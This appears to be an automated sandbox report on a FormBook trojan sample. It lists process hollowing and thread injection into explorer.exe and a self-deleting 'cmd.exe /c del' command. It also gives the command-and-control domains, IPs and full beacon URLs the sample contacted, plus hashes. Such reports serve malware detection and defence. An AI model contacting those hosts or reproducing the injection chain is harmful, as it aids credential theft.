Source: C:\Windows\SysWOW64\svchost.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\SRMETALINDUSTRIES.exe

Code function: 4_2_00409B30 LdrLoadDll,

4_2_00409B30

Source: C:\Users\user\Desktop\SRMETALINDUSTRIES.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Domain query: www.hisensor.world
Source: C:\Windows\explorer.exe	Domain query: www.integrity.directory
Source: C:\Windows\explorer.exe	Network Connect: 13.250.255.10 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.sashaignatenko.com
Source: C:\Windows\explorer.exe	Domain query: www.ifbrick.com
Source: C:\Windows\explorer.exe	Network Connect: 44.227.65.245 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.nordicbatterybelt.net
Source: C:\Windows\explorer.exe	Network Connect: 185.215.4.13 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 165.73.84.33 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.advindustry.com
Source: C:\Windows\explorer.exe	Network Connect: 185.134.245.113 80	Jump to behavior

Sample uses process hollowing technique

Show sources

Source: C:\Users\user\Desktop\SRMETALINDUSTRIES.exe

Section unmapped: C:\Windows\SysWOW64\svchost.exe base address: F60000

Jump to behavior

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\Desktop\SRMETALINDUSTRIES.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\SRMETALINDUSTRIES.exe	Section loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\SRMETALINDUSTRIES.exe	Section loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\user\Desktop\SRMETALINDUSTRIES.exe

Memory written: C:\Users\user\Desktop\SRMETALINDUSTRIES.exe base: 400000 value starts with: 4D5A

Jump to behavior

Queues an APC in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\SRMETALINDUSTRIES.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\SRMETALINDUSTRIES.exe	Thread register set: target process: 3440			Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread register set: target process: 3440			Jump to behavior

Source: C:\Users\user\Desktop\SRMETALINDUSTRIES.exe	Process created: C:\Users\user\Desktop\SRMETALINDUSTRIES.exe C:\Users\user\Desktop\SRMETALINDUSTRIES.exe			Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\SRMETALINDUSTRIES.exe'			Jump to behavior

Source: explorer.exe, 00000005.00000000.395221821.0000000000EE0000.00000002.00020000.sdmp, svchost.exe, 00000009.00000002.615538926.0000000005950000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000005.00000000.395221821.0000000000EE0000.00000002.00020000.sdmp, svchost.exe, 00000009.00000002.615538926.0000000005950000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000005.00000000.395221821.0000000000EE0000.00000002.00020000.sdmp, svchost.exe, 00000009.00000002.615538926.0000000005950000.00000002.00020000.sdmp	Binary or memory string: &Program Manager
Source: explorer.exe, 00000005.00000000.395221821.0000000000EE0000.00000002.00020000.sdmp, svchost.exe, 00000009.00000002.615538926.0000000005950000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\SRMETALINDUSTRIES.exe	Queries volume information: C:\Users\user\Desktop\SRMETALINDUSTRIES.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SRMETALINDUSTRIES.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SRMETALINDUSTRIES.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SRMETALINDUSTRIES.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SRMETALINDUSTRIES.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\SRMETALINDUSTRIES.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected FormBook

Show sources

Source: Yara match	File source: 4.2.SRMETALINDUSTRIES.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.SRMETALINDUSTRIES.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.611035350.0000000000E30000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.422353517.0000000000F00000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.610962252.0000000000E00000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.386735863.0000000007648000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.401938701.0000000007648000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.610457709.0000000000590000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.422322216.0000000000ED0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.357083874.00000000037F9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.421818321.0000000000400000.00000040.00000001.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected FormBook

Show sources

Source: Yara match	File source: 4.2.SRMETALINDUSTRIES.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.SRMETALINDUSTRIES.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.611035350.0000000000E30000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.422353517.0000000000F00000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.610962252.0000000000E00000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.386735863.0000000007648000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.401938701.0000000007648000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.610457709.0000000000590000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.422322216.0000000000ED0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.357083874.00000000037F9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.421818321.0000000000400000.00000040.00000001.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Shared Modules1	Path Interception	Process Injection612	Masquerading1	Input Capture1	Security Software Discovery221	Remote Services	Input Capture1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Disable or Modify Tools1	LSASS Memory	Process Discovery2	Remote Desktop Protocol	Archive Collected Data11	Exfiltration Over Bluetooth	Ingress Tool Transfer3	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Virtualization/Sandbox Evasion31	Security Account Manager	Virtualization/Sandbox Evasion31	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Process Injection612	NTDS	Remote System Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol13	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Deobfuscate/Decode Files or Information11	LSA Secrets	System Information Discovery112	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Obfuscated Files or Information4	Cached Domain Credentials	System Owner/User Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Software Packing13	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Timestomp1	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	File Deletion1	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
SRMETALINDUSTRIES.exe	20%	ReversingLabs	ByteCode-MSIL.Trojan.Barys
SRMETALINDUSTRIES.exe	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
4.2.SRMETALINDUSTRIES.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen		Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://www.domainnameshop.com/	0%	Avira URL Cloud	safe
https://www.domainnameshop.com/whois?currency=SEK&lang=sv	0%	Avira URL Cloud	safe
http://www.ifbrick.com/n58i/?fD=F+G31dedRh6HLTd+ecIv/qGaPc+OF0rVpdWlg5lJjBXzRtzoveZeEYo5TUAR7GVYQJUOwMAABw==&7nVT9d=P6AhC8Yh4LuLMhK0	0%	Avira URL Cloud	safe
http://www.nordicbatterybelt.net/n58i/?7nVT9d=P6AhC8Yh4LuLMhK0&fD=M2+dNbjF68Ecx6/kG0IjEvERphPYwrhl5ASQUZVNwgXuLMQcMfVPa3ABQDdZS66N8pSyWuXUWw==	0%	Avira URL Cloud	safe
http://www.starworks.online/n58i/?fD=PUNHIxjtOSFwkEXuacN/093UMB3LWAmrPV2Rldw+lO4ozANnbCtjpuKVlOTMjGDvzMsTPi3I2g==&7nVT9d=P6AhC8Yh4LuLMhK0	0%	Avira URL Cloud	safe
www.nordicbatterybelt.net/n58i/	0%	Avira URL Cloud	safe
https://www.domainnameshop.com/whois	0%	Avira URL Cloud	safe
http://www.integrity.directory/n58i/?7nVT9d=P6AhC8Yh4LuLMhK0&fD=unnhyE6s8wGaSGOfJAqqywl5AWsKat8KABC8TJyOz0JlXUzqDPtAwNp8gBEuIS9Csn5pfDFizQ==	0%	Avira URL Cloud	safe
http://www.sashaignatenko.com/n58i/?7nVT9d=P6AhC8Yh4LuLMhK0&fD=IQPyE+VrRvak8LK8nAdRdA+GXS2RT8iR9v4gvsbeLz4LfgOhT+qf8KqQA9G0pMp8GxoQ9RLGrw==	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
www.nordicbatterybelt.net	185.134.245.113	true	true	unknown
www.zmdhysm.com	154.64.44.142	true	false	unknown
www.integrity.directory	44.227.65.245	true	true	unknown
menramen.com	180.235.151.100	true	true	unknown
www.ifbrick.com	165.73.84.33	true	true	unknown
ladi-dns-ssl-nlb-prod-4-5fac4e17b8b8295e.elb.ap-southeast-1.amazonaws.com	13.250.255.10	true	false	high
sashaignatenko.com	185.215.4.13	true	true	unknown
www.hisensor.world	unknown	unknown	true	unknown
www.menramen.com	unknown	unknown	true	unknown
www.advindustry.com	unknown	unknown	true	unknown
www.sashaignatenko.com	unknown	unknown	true	unknown
www.starworks.online	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.ifbrick.com/n58i/?fD=F+G31dedRh6HLTd+ecIv/qGaPc+OF0rVpdWlg5lJjBXzRtzoveZeEYo5TUAR7GVYQJUOwMAABw==&7nVT9d=P6AhC8Yh4LuLMhK0	true	Avira URL Cloud: safe	unknown
http://www.nordicbatterybelt.net/n58i/?7nVT9d=P6AhC8Yh4LuLMhK0&fD=M2+dNbjF68Ecx6/kG0IjEvERphPYwrhl5ASQUZVNwgXuLMQcMfVPa3ABQDdZS66N8pSyWuXUWw==	true	Avira URL Cloud: safe	unknown
http://www.starworks.online/n58i/?fD=PUNHIxjtOSFwkEXuacN/093UMB3LWAmrPV2Rldw+lO4ozANnbCtjpuKVlOTMjGDvzMsTPi3I2g==&7nVT9d=P6AhC8Yh4LuLMhK0	true	Avira URL Cloud: safe	unknown
www.nordicbatterybelt.net/n58i/	true	Avira URL Cloud: safe	low
http://www.integrity.directory/n58i/?7nVT9d=P6AhC8Yh4LuLMhK0&fD=unnhyE6s8wGaSGOfJAqqywl5AWsKat8KABC8TJyOz0JlXUzqDPtAwNp8gBEuIS9Csn5pfDFizQ==	true	Avira URL Cloud: safe	unknown
http://www.sashaignatenko.com/n58i/?7nVT9d=P6AhC8Yh4LuLMhK0&fD=IQPyE+VrRvak8LK8nAdRdA+GXS2RT8iR9v4gvsbeLz4LfgOhT+qf8KqQA9G0pMp8GxoQ9RLGrw==	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.autoitscript.com/autoit3/J	explorer.exe, 00000005.00000000.441229219.000000000095C000.00000004.00000020.sdmp	false		high
https://tilda.cc	svchost.exe, 00000009.00000002.614986708.0000000003AB2000.00000004.00020000.sdmp	false		high
https://www.domainnameshop.com/	svchost.exe, 00000009.00000002.614986708.0000000003AB2000.00000004.00020000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.domainnameshop.com/whois?currency=SEK&lang=sv	svchost.exe, 00000009.00000002.614986708.0000000003AB2000.00000004.00020000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.domeneshop.no/whois	svchost.exe, 00000009.00000002.614986708.0000000003AB2000.00000004.00020000.sdmp	false		high
https://www.domainnameshop.com/whois	svchost.exe, 00000009.00000002.614986708.0000000003AB2000.00000004.00020000.sdmp	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
185.215.4.13	sashaignatenko.com	Denmark	50129	TVHORADADAES	true
165.73.84.33	www.ifbrick.com	South Africa	37611	AfrihostZA	true
13.250.255.10	ladi-dns-ssl-nlb-prod-4-5fac4e17b8b8295e.elb.ap-southeast-1.amazonaws.com	United States	16509	AMAZON-02US	false
185.134.245.113	www.nordicbatterybelt.net	Norway	12996	DOMENESHOPOsloNorwayNO	true
44.227.65.245	www.integrity.directory	United States	16509	AMAZON-02US	true

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	483595
Start date:	15.09.2021
Start time:	09:42:07
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 11m 29s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	SRMETALINDUSTRIES.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	24
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@7/1@9/5
EGA Information:	Failed
HDC Information:	Successful, ratio: 69.1% (good quality ratio 64.3%) Quality average: 71.2% Quality standard deviation: 31%
HCA Information:	Successful, ratio: 100% Number of executed functions: 85 Number of non-executed functions: 124
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 92.122.145.220, 23.203.67.116, 20.82.210.154, 23.55.161.148, 23.55.161.142, 23.55.161.153, 23.55.161.152, 23.55.161.143, 23.55.161.137, 23.55.161.141, 23.55.161.147, 23.55.161.144, 20.54.110.249, 40.112.88.60, 23.216.77.209, 23.216.77.208, 23.35.236.56, 20.82.209.183 Excluded domains from analysis (whitelisted): store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a767.dspw65.akamai.net, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, cdn.onenote.net.edgekey.net, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, cdn.onenote.net, prod.fs.microsoft.com.akadns.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, e1553.dspg.akamaiedge.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net Not all processes where analyzed, report is missing behavior information VT rate limit hit for: /opt/package/joesandbox/database/analysis/483595/sample/SRMETALINDUSTRIES.exe

Simulations

Behavior and APIs

Time	Type	Description
09:43:07	API Interceptor	1x Sleep call for process: SRMETALINDUSTRIES.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
185.134.245.113	Y-20211907-00927735_pdf.exe	Get hash	malicious	Browse	www.bjornadal.info/uisg/?tF=ML04lb7xhZYx&5j3p=ijpPZzbaHpqswGzO9IDjiR3ZgO0IY8lCdEHX90hnfo+miiKxnWc46XtyT8avhaMcoLuh
	00987263554120715_pdf.exe	Get hash	malicious	Browse	www.bjornadal.info/uisg/?iL0llN=ijpPZzbaHpqswGzO9IDjiR3ZgO0IY8lCdEHX90hnfo+miiKxnWc46XtyT/6VxLskysPm&V0=1b_XAVMxthBDxzZ
	Swift copy_9808.exe	Get hash	malicious	Browse	www.hielogram.com/p6nu/?C2JdTP=GwnG2+4Ox+q27cUESZmcj87F8LDwpP64CUxCFnmRgyZ7JM+qKfxBNMNAEaQTgW16Viyh&z6nHM=ITnT9Fg
	EJIMS.exe	Get hash	malicious	Browse	www.arctic-thinking.com/eo5u/?ATRPZLx=yydTUguCIsKUBqex5kw2B9bqR/Tbmi27HEsVkFuXlSNVQzjMEAVLIBKERmZxc8b3054g&3fqHGn=ZlnpMphxFT
	APR SOA---- Worldwide Partner--WWP SC+SHA.PDF.exe	Get hash	malicious	Browse	www.trivesse.online/o86d/?2dqLW0=RXBPDPWx&Sh=EfT1fZ4XBAI8B8lFjECuzLyH8vcwDBWO8j8rpLkPmh4yQ+zcTfmOhiRB11y90XxVAevV
	Financial Results April 21.pptx (9,753K).exe	Get hash	malicious	Browse	www.eiendomsadvokatene.net/tboh/?yrvHSPgX=ifurjOVBbv//NDfC0jTFaWSdJ8grIL0sgHNRQvokJCpwOnIquQkn/Qmuz7SUk/WVwqYj&K8e4v=Ab8TRh10Irv0MPg
	Pd0Tb0v0WW.exe	Get hash	malicious	Browse	www.appexivo.com/iu4d/?jBZ4=nai0PiE1ZI6LgVYNyYhI/SvPFfYDGGwz3NFtmAbMwqVtCuJxJmoPqqdQ/D4EO5hGmBl8&1bz=WXrpCdsXv
	Payment_03262021_jpg.exe	Get hash	malicious	Browse	www.8bitupgrades.com/c8bs/?CR=_DKdKjZ&b6=rCYK2h3daI9iLKwlqGql+neFNq6uaEMs6im2KbEaS7MRsnsGRrLrxjr70kWezIj/WNmY
	MV WAF PASSION.exe	Get hash	malicious	Browse	www.appexivo.com/iu4d/?EZA0pp=nai0PiE1ZI6LgVYNyYhI/SvPFfYDGGwz3NFtmAbMwqVtCuJxJmoPqqdQ/AY+eoB+8mE7&GzrX9=Axo834d
	Zahlung_03242021_png.exe	Get hash	malicious	Browse	www.8bitupgrades.com/c8bs/?w2=MDK0&9rn0Id=rCYK2h3daI9iLKwlqGql+neFNq6uaEMs6im2KbEaS7MRsnsGRrLrxjr70kWezIj/WNmY
	57Db7VS2KO.exe	Get hash	malicious	Browse	www.badstar.net/tmz/?Exl0=soNcoPEoKs/c3JYaXreneZuYDx5TVTPv8pA9M7HUNPC+lj2LTt6w6+c1A2SnPUqMNeJe&0pk=WHnxA2AX6
	imTmqTngvS.exe	Get hash	malicious	Browse	www.badstar.net/tmz/?8p=fdiLulhXj&qFQhSfAp=soNcoPEoKs/c3JYaXreneZuYDx5TVTPv8pA9M7HUNPC+lj2LTt6w6+c1A2encEmPUOJIldnKYw==
	GOLvTSVQTD8nam7.exe	Get hash	malicious	Browse	www.badstar.net/tmz/?u6u0=soNcoPEoKs/c3JYaXreneZuYDx5TVTPv8pA9M7HUNPC+lj2LTt6w6+c1A2SnPUqMNeJe&9rTl7P=xPJpGjT8
	Spisemuligheds4.exe	Get hash	malicious	Browse	www.sandefjordsiliconalley.com/gpb6/?2d=EqzoeepA8esh1pAvenM/kydmrwltihbGhGRyCMC7xU0PDBdRFIVsT21NQR90+Y61XWjx&SBtxlt=lxlHQfw0FrIH
	11INVOICE-424.exe	Get hash	malicious	Browse	www.rykkje.com/pf/?r6i=chA3uRGzsUNIJgxeMb+dI9dpbdiI7tUlatD/6M2sqkmnf0EWoBz/0OUDrUzEx5zxBD1K&X40duf=CXC8gt0Hmftxf

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
www.ifbrick.com	arrival notice.exe	Get hash	malicious	Browse	165.73.84.33

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
TVHORADADAES	qLadwVPkMz	Get hash	malicious	Browse	156.67.60.34
	p7Qq8Ln8ci	Get hash	malicious	Browse	156.67.60.40
	5tofauAltQ	Get hash	malicious	Browse	156.67.60.40
AfrihostZA	re2.arm	Get hash	malicious	Browse	169.107.156.36
	re2.arm7	Get hash	malicious	Browse	169.89.231.162
	re2.x86	Get hash	malicious	Browse	169.80.5.202
	jFQ6SEAt26	Get hash	malicious	Browse	169.173.214.123
	jew.x86	Get hash	malicious	Browse	169.25.95.48
	dLxs6bCblA	Get hash	malicious	Browse	169.222.71.96
	arm7	Get hash	malicious	Browse	169.222.46.78
	6ZGab0gD1Y	Get hash	malicious	Browse	169.119.83.192
	RIkJg4Hr71	Get hash	malicious	Browse	169.111.209.239
	OyGRw8uet6	Get hash	malicious	Browse	169.86.25.61
	JJfh1PN87T	Get hash	malicious	Browse	169.125.23.224
	p0zDxJeEqa	Get hash	malicious	Browse	169.94.241.33
	ccvgtVRQBx	Get hash	malicious	Browse	169.210.58.168
	omuCbLDC5Q	Get hash	malicious	Browse	169.102.53.217
	mirai.x86	Get hash	malicious	Browse	169.161.194.174
	arm	Get hash	malicious	Browse	169.200.148.123
	fk8YZet4QU	Get hash	malicious	Browse	169.64.28.240
	4nLik56DrD	Get hash	malicious	Browse	169.94.79.91
	loligang.x86	Get hash	malicious	Browse	169.201.30.148
	frosty.x86	Get hash	malicious	Browse	169.108.151.49

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SRMETALINDUSTRIES.exe.log Download File
Process:	C:\Users\user\Desktop\SRMETALINDUSTRIES.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.355304211458859
Encrypted:	false
SSDEEP:	24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
MD5:	FED34146BF2F2FA59DCF8702FCC8232E
SHA1:	B03BFEA175989D989850CF06FE5E7BBF56EAA00A
SHA-256:	123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
SHA-512:	1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
Malicious:	true
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.16194389663395
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	SRMETALINDUSTRIES.exe
File size:	586752
MD5:	51fb6f484b4bc554a7fddb7dc24c994e
SHA1:	6548d2e4c988457deb2a3435220f3252367462f3
SHA256:	4b9ec9143ae2471c8cf540f5e3815c4ca4bb5e073d5c45e6bd934cc0350e8546
SHA512:	703b898725b19590fb833a988a49af207cbb367b508ff58b7c662bd5d6646689276267320d1e915fa7bb8b3201fe43b7b25ec61cf3188c5f5b4ad83c74591aad
SSDEEP:	12288:FWHCM2K4CN9qqlp8VhzlG9lHBxe1/q+t0N0g8TJpG+Q:v3CNvlp8zw3Bx6tbh3G+Q
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....M...............0......Z........... ........@.. .......................@............@................................

File Icon


Icon Hash:	b2b2a9d69264381b

Static PE Info

General
Entrypoint:	0x48b7e6
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0xE74DE4BD [Sat Dec 20 20:02:05 2092 UTC]
TLS Callbacks:
CLR (.Net) Version:	v4.0.30319
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
